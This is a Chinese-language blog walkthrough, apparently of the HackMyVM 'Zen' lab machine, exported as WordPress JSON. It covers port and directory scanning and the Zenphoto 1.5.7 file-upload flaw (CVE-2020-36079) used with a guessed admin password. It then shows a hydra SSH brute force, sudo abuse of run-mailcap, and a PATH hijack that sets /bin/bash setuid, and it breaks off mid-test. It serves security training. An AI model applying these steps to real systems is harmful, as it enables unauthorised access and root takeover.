{"id":791,"date":"2024-09-04T00:33:54","date_gmt":"2024-09-03T16:33:54","guid":{"rendered":"http:\/\/162.14.82.114\/?p=791"},"modified":"2024-09-04T00:33:54","modified_gmt":"2024-09-03T16:33:54","slug":"hmv-_-zen","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/791\/09\/04\/2024\/","title":{"rendered":"hmv[-_-]Zen"},"content":{"rendered":"

Zen<\/h1>\n

\"image-20240903190031114\"<\/div>
\n
\"image-20240903230835587\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Zen]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.105:22\nOpen 192.168.10.105:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtt+32ss5h1pcUs2MuWp3IYc9\/1tC5dGSdRgbAjJP3JjwCsw2eRI5at93ZcdSjYE4+sSAr9u67C0aXI5bfzh+m0xJgKXykKE3qTn\/zUGbyyA2Gjoz6gTtSn0RK9efz7Crlgk9X1Kvlx2SM1zPa4k\/kjdck5mUQokkInrTIjjdJ\/dBmq1KXpRGMP9TTXoHVee3g6wer5WYXe8NmDagHIsUlaqIndAuxtF1sudPcdrRuYx+hjiU8oAkD0A0bfHkpnqjk93XeeeWIre7I7YayhuSIRQzHUJ2sTiHXjvpnSbiLHcdNKhtI+A40ryd2aBKr7Cw3bbOjq9hzSpUw6Wq2e7iX\n|   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLTOQFx7hoQdYlZDUFzhxVuC1d4m6JEQSlKmiiPdoscY8qbaFVOaJioNgG3SXxs+F0G8YIUn70qVRmSUq1Zre4g=\n|   256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdCOsSqkfyzmppd3gNlR22gPVG28sQ5Rw4aWSfLX3AX\n80\/tcp open  http    syn-ack nginx 1.14.2\n|_http-title: Galer\\xC3\\xADa\n|_http-favicon: Unknown favicon MD5: 2A479B69AB8479876CB5A7E6384E7A85\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n| http-robots.txt: 9 disallowed entries \n| \/albums\/ \/plugins\/ \/P@ssw0rd \/themes\/ \/zp-core\/ \n|_\/zp-data\/ \/page\/search\/ \/uploaded\/ \/backup\/\n|_http-server-header: nginx\/1.14.2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Zen]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.105\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   401,403,404,301\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 4261]\n\/albums.php           (Status: 503) [Size: 213]\nProgress: 3703 \/ 882244 (0.42%)[ERROR] Get "http:\/\/192.168.10.105\/analysis": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.105\/contest": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.105\/Content.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.105\/Content.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.105\/Content.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 3835 \/ 882244 (0.43%)[ERROR] Get "http:\/\/192.168.10.105\/contest.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.105\/Content": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 6161 \/ 882244 (0.70%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 6439 \/ 882244 (0.73%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Zen]\n\u2514\u2500$ curl http:\/\/$IP\n............\n<!-- zenphoto version 1.5.7 -->\n<!-- Zenphoto script processing end:0.0064 seconds -->\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Zen]\n\u2514\u2500$ whatweb http:\/\/$IP                                                                                                           \nhttp:\/\/192.168.10.105 [200 OK] Cookies[zenphoto_ssl,zp_user_auth], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx\/1.14.2], HttpOnly[zp_user_auth], IP[192.168.10.105], JQuery, Script[text\/javascript], Title[Galer\u00eda], nginx[1.14.2]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Zen]\n\u2514\u2500$ curl http:\/\/$IP\/robots.txt                                                     \nUser-agent: *\nDisallow: \/albums\/\nAllow: \/cache\/\nAllow: \/cache_html\/\nDisallow: \/plugins\/\nDisallow: \/P@ssw0rd\nDisallow: \/themes\/\nDisallow: \/zp-core\/\nDisallow: \/zp-data\/\nDisallow: \/page\/search\/\nDisallow: \/uploaded\/\nDisallow: \/backup\/\n\n# Link to the sitemap file if using teh sitemap-extended plugin.\n# Change it to your domain and uncomment the line to use it:\n# sitemap: http:\/\/www.yourdomain.com\/cache_html\/sitemap\/sitemapindex.xml<\/code><\/pre>\n
\u67e5\u770b\u7248\u672c\u6f0f\u6d1e<\/h3>\n
\"image-20240903231606894\"<\/div><\/p>\n
google \u4e00\u4e0b\uff1a<\/p>\n
\"image-20240903231646129\"<\/div><\/p>\n
\u4ecb\u7ecd\u5982\u4e0b\uff1a<\/p>\n
Authenticated arbitrary file upload to RCE\n\nProduct : Zenphoto \nAffected : Zenphoto CMS - <= 1.5.7\nAttack Type : Remote\n\nlogin then go to plugins then go to uploader and press on the check box elFinder\nthen press apply , after that you go to upload then Files(elFinder) drag and drop\nany malicious php code after that go to \/uploaded\/ and you're php code\n\n--------------------------------------------------------------------------------------------\nZenphoto through 1.5.7 is affected by authenticated arbitrary file\nupload, leading to remote code execution. The attacker must navigate to\nthe uploader plugin, check the elFinder box, and then drag and drop\nfiles into the Files(elFinder) portion of the UI. This can, for\nexample, place a .php file in the server's uploaded\/ directory.\n\n[Reference]\nhttps:\/\/www.linkedin.com\/in\/abdulaziz-almisfer-22a7861ab\/ \nhttps:\/\/twitter.com\/3almisfer\nhttps:\/\/github.com\/azizalshammari\/\n\n------------------------------------------\n[Discoverer]\nAbdulaziz Almisfer\n\nCVE-2020-36079<\/code><\/pre>\n
\u9776\u673a\u65f6\u95f4\u662f2021\uff0c\u5bf9\u7684\u4e0a\uff0c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
http:\/\/192.168.10.105\/zp-core\/admin.php<\/code><\/pre>\n
\"image-20240903231936233\"<\/div><\/p>\n
\u5c1d\u8bd5\u4f7f\u7528\u9ed8\u8ba4\u8d26\u53f7\u548c\u4e0a\u9762\u7ed9\u7684\u90a3\u4e2a\u5947\u602a\u7684\u5bc6\u7801\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
admin\nP@ssw0rd<\/code><\/pre>\n
\"image-20240903232215742\"<\/div><\/p>\n
\u6253\u5f00efinder<\/code>\u63d2\u4ef6\u5c1d\u8bd5\u53cd\u5f39 shell\uff1a<\/p>\n
\"image-20240903232331107\"<\/div>
\n
\"image-20240903232624773\"<\/div><\/p>\n
\u4e0a\u4f20\u7136\u540e\u53f3\u952e\uff0c\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff0c\u5c31\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n
\"image-20240903232950315\"<\/div>
\n
\"image-20240903233001893\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@zen:\/$ cat \/etc\/passwd | grep sh \nroot:x:0:0:root:\/root:\/bin\/bash\nkodo:x:1000:1000:kodo,,,:\/home\/kodo:\/bin\/bash\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nzenmaster:x:1001:1001:,,,:\/home\/zenmaster:\/bin\/bash\nhua:x:1002:1002:,,,:\/home\/hua:\/bin\/bash\n\n(remote) www-data@zen:\/$ ls -la \/home\ntotal 20\ndrwxr-xr-x  5 root      root      4096 Jun 14  2021 .\ndrwxr-xr-x 18 root      root      4096 Jun 14  2021 ..\ndrwxr-xr-x  2 hua       hua       4096 Jun 14  2021 hua\ndrwxr-xr-x  2 kodo      kodo      4096 Jun 14  2021 kodo\ndrwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14  2021 zenmaster\n\n(remote) www-data@zen:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n(remote) www-data@zen:\/$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep<\/code><\/pre>\n
\u5f31\u5bc6\u7801\u7206\u7834\u7528\u6237<\/h3>\n
\u5176\u4ed6\u4e24\u4e2a\u7528\u6237\u7684\u76ee\u5f55\u91cc\u5565\u90fd\u6ca1\u6709\uff0c\u53ea\u6709zen\u6709userflag\uff0c\u6240\u4ee5\u8fd9\u662f\u65b9\u5411<\/p>\n
(remote) www-data@zen:\/$ find \/ -user zenmaster -type f 2>\/dev\/null\n\/home\/zenmaster\/.profile\n\/home\/zenmaster\/user.txt\n\/home\/zenmaster\/.bashrc\n\/home\/zenmaster\/.bash_logout\n(remote) www-data@zen:\/$ find \/ -group zenmaster -type f 2>\/dev\/null\n\/home\/zenmaster\/.profile\n\/home\/zenmaster\/user.txt\n\/home\/zenmaster\/.bashrc\n\/home\/zenmaster\/.bash_logout<\/code><\/pre>\n
\u56e0\u4e3a\u5565\u90fd\u6ca1\u6709\uff0c\u6240\u4ee5\u5c1d\u8bd5\u5f31\u5bc6\u7801\u8fdb\u884c\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Zen]\n\u2514\u2500$ batcat user                      \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500       \u2502 File: user\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500   1   \u2502 root\n   2   \u2502 hua\n   3   \u2502 koda\n   4   \u2502 zen\n   5   \u2502 zenmaster\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Zen]\n\u2514\u2500$ hydra -L user -P user ssh:\/\/$IP 2>\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-09-03 11:48:03\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5\/p:5), ~2 tries per task\n[DATA] attacking ssh:\/\/192.168.10.105:22\/\n[22][ssh] host: 192.168.10.105   login: zenmaster   password: zenmaster\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-09-03 11:48:12<\/code><\/pre>\n
\"image-20240903234941531\"<\/div><\/p>\n
bash\u63d0\u6743kodo<\/h3>\n
\"image-20240903235044434\"<\/div><\/p>\n
\u63d0\u6743hua<\/h3>\n
kodo@zen:~$ sudo -l\nMatching Defaults entries for kodo on zen:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser kodo may run the following commands on zen:\n    (hua) NOPASSWD: \/usr\/bin\/see\nkodo@zen:~$ ls -la\ntotal 24\ndrwxr-xr-x 2 kodo kodo 4096 Jun 14  2021 .\ndrwxr-xr-x 5 root root 4096 Jun 14  2021 ..\n-rw-r--r-- 1 kodo kodo  220 Jun 14  2021 .bash_logout\n-rw-r--r-- 1 kodo kodo 3526 Jun 14  2021 .bashrc\n-rw-r--r-- 1 kodo kodo  807 Jun 14  2021 .profile\n-rw------- 1 kodo kodo   49 Jun 14  2021 .Xauthority\nkodo@zen:~$ cat .Xauthority \nzen10MIT-MAG\nkodo@zen:~$ xxd .Xauthority \n00000000: 0100 0003 7a65 6e00 0231 3000 124d 4954  ....zen..10..MIT\n00000010: 2d4d 4147 4943 2d43 4f4f 4b49 452d 3100  -MAGIC-COOKIE-1.\n00000020: 1090 e0e1 9ebf 6b21 507d d41b 76a7 7766  ......k!P}..v.wf\n00000030: 50                                       P\nkodo@zen:~$ ls -la \/usr\/bin\/see\nlrwxrwxrwx 1 root root 11 Feb  9  2019 \/usr\/bin\/see -> run-mailcap\nkodo@zen:~$ \/usr\/bin\/see\nkodo@zen:~$ pwd\n\/home\/kodo\nkodo@zen:~$ \/usr\/bin\/see -h\nUse: \/usr\/bin\/see <--action=VAL> [--debug] [MIME-TYPE:[ENCODING:]]FILE [...]\n\nOptions:\n  action        specify what action to do on these files (default=view)\n  debug         be verbose about what's going on\n  nopager       ignore any "copiousoutput" directives and never use a "pager"\n  norun         just print but don't execute the command (useful with --debug)\n\nMime-Type:\n  any standard mime type designation in the form <class>\/<subtype> -- if\n  not specified, it will be determined from the filename extension\n\nEncoding:\n  how the file (and type) has been encoded (only "gzip", "bzip2,"\n  "xz" and "compress" are supported) -- if not specified, it will be\n   determined from the filename extension<\/code><\/pre>\n
\u770b\u4e0a\u53bb\u6709\u70b9\u773c\u719f\uff0c\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff0c\u53ef\u4ee5\u53c2\u8003 https:\/\/gtfobins.github.io\/gtfobins\/run-mailcap\/#sudo<\/a>\uff1a<\/p>\n
kodo@zen:~$ sudo -u hua \/usr\/bin\/see --action=view \/etc\/hosts<\/code><\/pre>\n
\"image-20240903235907871\"<\/div><\/p>\n
\u52ab\u6301\u73af\u5883\u53d8\u91cf\u63d0\u6743root<\/h3>\n
hua@zen:\/home\/kodo$ cd ~\nhua@zen:~$ sudo -l\nMatching Defaults entries for hua on zen:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser hua may run the following commands on zen:\n    (ALL : ALL) NOPASSWD: \/usr\/sbin\/add-shell zen\nhua@zen:~$ sudo \/usr\/sbin\/add-shell zen\nhua@zen:~$ whoami;id\nhua\nuid=1002(hua) gid=1002(hua) groups=1002(hua)\nhua@zen:~$ ls -la \/usr\/sbin\/add-shell\n-rwxr-xr-x 1 root root 860 Jan 21  2019 \/usr\/sbin\/add-shell\nhua@zen:~$ file \/usr\/sbin\/add-shell\n\/usr\/sbin\/add-shell: POSIX shell script, ASCII text executable\nhua@zen:~$ cat \/usr\/sbin\/add-shell\n#!\/bin\/sh -e\n\nif test $# -eq 0\nthen\n        echo usage: $0 shellname [shellname ...]\n        exit 1\nfi\n\nfile=\/etc\/shells\n# I want this to be GUARANTEED to be on the same filesystem as $file\ntmpfile=${file}.tmp\n\nset -o noclobber\n\ntrap "rm -f $tmpfile" EXIT\n\nif ! awk '{print}' $file > $tmpfile\nthen\n        cat 1>&2 <<EOF\nEither another instance of $0 is running, or it was previously interrupted.\nPlease examine ${tmpfile} to see if it should be moved onto ${file}.\nEOF\n        exit 1\nfi\n\nfor i\ndo\n        REALDIR="$(dirname $(realpath -m $i))\/$(basename $i)"\n        for j in "$i" "$REALDIR"\n        do\n                if ! grep -q "^${j}$" $tmpfile\n                then\n                        echo $j >> $tmpfile\n                fi\n        done\ndone\n\nchmod --reference=$file $tmpfile\nchown --reference=$file $tmpfile\n\nmv $tmpfile $file\n\ntrap "" EXIT\nexit 0<\/code><\/pre>\n
\u53d1\u73b0\uff1a<\/p>\n
hua@zen:~$ ls -la \/etc\/shells\n-rw-r--r-- 1 root root 134 Sep  3 11:59 \/etc\/shells\nhua@zen:~$ cat \/etc\/shells\n# \/etc\/shells: valid login shells\n\/bin\/sh\n\/bin\/bash\n\/usr\/bin\/bash\n\/bin\/rbash\n\/usr\/bin\/rbash\n\/bin\/dash\n\/usr\/bin\/dash\nzen\n\/home\/hua\/zen\nhua@zen:~$ $PATH\nbash: \/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin: No such file or directory<\/code><\/pre>\n
\u7136\u540e\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u53ef\u5199\u76ee\u5f55\uff1a<\/p>\n
hua@zen:~$ $PATH\nbash: \/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin: No such file or directory\nhua@zen:~$ ls -la \/usr\/local\/sbin\ntotal 8\ndrwxr-xr-x  2 root root 4096 Jun 14  2021 .\ndrwxr-xr-x 10 root root 4096 Jun 14  2021 ..\nhua@zen:~$ ls -la \/usr\/local\/bin\ntotal 8\ndrwxr-xrwx  2 root root 4096 Jun 14  2021 .\ndrwxr-xr-x 10 root root 4096 Jun 14  2021 ..<\/code><\/pre>\n
\u5c1d\u8bd5\u52ab\u6301\u73af\u5883\u53d8\u91cf\uff1a<\/p>\n
hua@zen:\/usr\/local\/bin$ strace \/usr\/sbin\/add-shell zen 2> \/var\/tmp\/log\nhua@zen:\/usr\/local\/bin$ cat \/var\/tmp\/log | grep \/usr\nexecve("\/usr\/sbin\/add-shell", ["\/usr\/sbin\/add-shell", "zen"], 0x7ffd725562a8 \/* 17 vars *\/) = 0\nstat("\/usr\/local\/bin", {st_mode=S_IFDIR|0757, st_size=4096, ...}) = 0\nopenat(AT_FDCWD, "\/usr\/sbin\/add-shell", O_RDONLY) = 5\nwrite(2, "\/usr\/sbin\/add-shell: 17: \/usr\/sb"..., 46\/usr\/sbin\/add-shell: 17: \/usr\/sbin\/add-shell: ) = 46\nstat("\/usr\/local\/sbin\/awk", 0x7ffebfd21c20) = -1 ENOENT (No such file or directory)\nstat("\/usr\/local\/bin\/awk", 0x7ffebfd21c20) = -1 ENOENT (No such file or directory)\nstat("\/usr\/sbin\/awk", 0x7ffebfd21c20)   = -1 ENOENT (No such file or directory)\nstat("\/usr\/bin\/awk", {st_mode=S_IFREG|0755, st_size=674624, ...}) = 0\nwrite(6, "Either another instance of \/usr\/"..., 171) = 171\nstat("\/usr\/local\/sbin\/cat", 0x7ffebfd21c20) = -1 ENOENT (No such file or directory)\nstat("\/usr\/local\/bin\/cat", 0x7ffebfd21c20) = -1 ENOENT (No such file or directory)\nstat("\/usr\/sbin\/cat", 0x7ffebfd21c20)   = -1 ENOENT (No such file or directory)\nstat("\/usr\/bin\/cat", {st_mode=S_IFREG|0755, st_size=43744, ...}) = 0\nwait4(-1, Either another instance of \/usr\/sbin\/add-shell is running, or it was previously interrupted.\nstat("\/usr\/local\/sbin\/rm", 0x7ffebfd21b80) = -1 ENOENT (No such file or directory)\nstat("\/usr\/local\/bin\/rm", 0x7ffebfd21b80) = -1 ENOENT (No such file or directory)\nstat("\/usr\/sbin\/rm", 0x7ffebfd21b80)    = -1 ENOENT (No such file or directory)\nstat("\/usr\/bin\/rm", {st_mode=S_IFREG|0755, st_size=68416, ...}) = 0<\/code><\/pre>\n
\u53d1\u73b0\u5b58\u5728\u82e5\u5e72\u53ef\u4ee5\u88ab\u5229\u7528\u7684\u547d\u4ee4\uff1a<\/p>\n
awk\ncat\nrm<\/code><\/pre>\n
\u597d\u50cf\u90fd\u884c\uff0c\u5c1d\u8bd5\u63d0\u6743\uff1a<\/p>\n
hua@zen:\/usr\/local\/bin$ ls -la\ntotal 8\ndrwxr-xrwx  2 root root 4096 Sep  3 12:20 .\ndrwxr-xr-x 10 root root 4096 Jun 14  2021 ..\nhua@zen:\/usr\/local\/bin$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1168776 Apr 18  2019 \/bin\/bash\nhua@zen:\/usr\/local\/bin$ echo 'chmod +s \/bin\/bash' > cat; chmod +x *; ls -la\ntotal 12\ndrwxr-xrwx  2 root root 4096 Sep  3 12:21 .\ndrwxr-xr-x 10 root root 4096 Jun 14  2021 ..\n-rwxr-xr-x  1 hua  hua    19 Sep  3 12:21 cat\nhua@zen:\/usr\/local\/bin$ sudo \/usr\/sbin\/add-shell zen\nhua@zen:\/usr\/local\/bin$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1168776 Apr 18  2019 \/bin\/bash\nhua@zen:\/usr\/local\/bin$ echo 'chmod +s \/bin\/bash' > awk; chmod +x *; ls -la\ntotal 16\ndrwxr-xrwx  2 root root 4096 Sep  3 12:22 .\ndrwxr-xr-x 10 root root 4096 Jun 14  2021 ..\n-rwxr-xr-x  1 hua  hua    19 Sep  3 12:22 awk\n-rwxr-xr-x  1 hua  hua    19 Sep  3 12:21 cat\nhua@zen:\/usr\/local\/bin$ sudo \/usr\/sbin\/add-shell zen\nhua@zen:\/usr\/local\/bin$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1168776 Apr 18  2019 \/bin\/bash<\/code><\/pre>\n
\u53d1\u73b0cat\u4e0d\u884c\uff0c\u4f46\u662fawk\u53ef\u4ee5\uff0c\u5c1d\u8bd5\u4e86grep\u53d1\u73b0\u4e5f\u53ef\u4ee5\uff0c\u4f46\u662frm\u4e0d\u884c\uff1a<\/p>\n
hua@zen:\/usr\/local\/bin$ echo 'aaa' > \/tmp\/test\nhua@zen:\/usr\/local\/bin$ echo 'chmod +s \/tmp\/test' > grep\nhua@zen:\/usr\/local\/bin$ ls -la \/tmp\/test\n-rw-r--r-- 1 hua hua 4 Sep  3 12:25 \/tmp\/test\nhua@zen:\/usr\/local\/bin$ sudo \/usr\/sbin\/add-shell zen\nhua@zen:\/usr\/local\/bin$ ls -la \/tmp\/test\n-rw-r--r-- 1 hua hua 4 Sep  3 12:25 \/tmp\/test\nhua@zen:\/usr\/local\/bin$ ls -la\ntotal 12\ndrwxr-xrwx  2 root root 4096 Sep  3 12:26 .\ndrwxr-xr-x 10 root root 4096 Jun 14  2021 ..\n-rw-r--r--  1 hua  hua    19 Sep  3 12:26 grep\nhua@zen:\/usr\/local\/bin$ chmod +x *\nhua@zen:\/usr\/local\/bin$ sudo \/usr\/sbin\/add-shell zen\nhua@zen:\/usr\/local\/bin$ ls -la \/tmp\/test\n-rwSr-Sr-- 1 hua hua 4 Sep  3 12:25 \/tmp\/test\nhua@zen:\/usr\/local\/bin$ echo 'chmod -s \/tmp\/test' > rm\nhua@zen:\/usr\/local\/bin$ sudo \/usr\/sbin\/add-shell zen\nhua@zen:\/usr\/local\/bin$ ls -la \/tmp\/test\n-rwSr-Sr-- 1 hua hua 4 Sep  3 12:25 \/tmp\/test\nhua@zen:\/usr\/local\/bin$ chmod +x rm\nhua@zen:\/usr\/local\/bin$ ls -la \/tmp\/test\n-rwSr-Sr-- 1 hua hua 4 Sep  3 12:25 